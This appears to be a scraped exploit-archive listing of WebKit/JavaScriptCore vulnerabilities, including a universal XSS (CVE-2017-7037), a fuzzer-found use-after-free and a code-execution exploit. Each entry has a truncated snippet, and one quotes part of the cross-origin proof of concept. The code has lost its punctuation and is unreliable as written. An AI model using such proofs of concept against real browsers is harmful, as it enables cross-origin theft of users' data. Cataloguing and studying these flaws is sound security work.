WebKit - Universal XSS in JSObject::putInlineSlow and JSValue::putToPrimitive

WebKit - Universal XSS in JSObject::putInlineSlow and JSValue::putToPrimitive VULNERABILITY DETAILS bool JSObject::putInlineSlowExecState exec, PropertyName propertyName, JSValue value, PutPropertySlot& slot ASSERT!isThisValueAlteredslot, this; VM& vm = exec-vm; auto scope = DECLARETHROWSCOPEvm;...

macOS / iOS JavaScriptCore - JSValue Use-After-Free in ValueProfiles

While fuzzing JSC, I encountered the following JS program which crashes JSC from current HEAD and release /System/Library/Frameworks/JavaScriptCore.framework/Resources/jsc: // Run with --useConcurrentJIT=false --thresholdForJITAfterWarmUp=10 function fullGC for var i = 0; i 10; i++ new...

JavaScript Core - Arbitrary Code Execution

JavaScript Core - Arbitrary Code Execution // Load Int library, thanks saelo! load'util.js'; load'int64.js'; // Helpers to convert from float to in a few random places var conva = new ArrayBuffer8; var convf = new Float64Arrayconva; var convi = new Uint32Arrayconva; var convi8 = new...

WebKit: JSC: UXSS via JSObject::putInlineSlow and JSValue::putToPrimitive(CVE-2017-7037)

JSObject::putInlineSlow and JSValue::putToPrimitive use getPrototypeDirect instead of getPrototype to get an object's prototype. So JSDOMWindow::getPrototype which checks the Same Origin Policy is not called. The PoC shows to call a setter of another origin's object. PoC 1 -...

WebKit JSC JSObject::putInlineSlow / JSValue::putToPrimitive XSS Vulnerability

WebKit JSC JSObject::putInlineSlow and JSValue::putToPrimitive suffer from a universal cross site scripting vulnerability. WebKit: JSC: UXSS via JSObject::putInlineSlow and JSValue::putToPrimitive CVE-2017-7037 JSObject::putInlineSlow and JSValue::putToPrimitive use getPrototypeDirect instead of...

WebKit JSC JSObject::putInlineSlow / JSValue::putToPrimitive XSS

WebKit: JSC: UXSS via JSObject::putInlineSlow and JSValue::putToPrimitive CVE-2017-7037 JSObject::putInlineSlow and JSValue::putToPrimitive use getPrototypeDirect instead of getPrototype to get an object's prototype. So JSDOMWindow::getPrototype which checks the Same Origin Policy is not called...

WebKit JSC - 'JSObject::putInlineSlow' / 'JSValue::putToPrimitive' Universal Cross-Site Scripting

let f = document.body.appendChilddocument.createElement'iframe'; let loc = f.contentWindow.location; f.onload = = let a = 1.2; a.proto.proto = f.contentWindow; a'test' = toString: function arguments.callee.caller.constructor'alertlocation'; ; ; f.src = 'data:text/html,' +...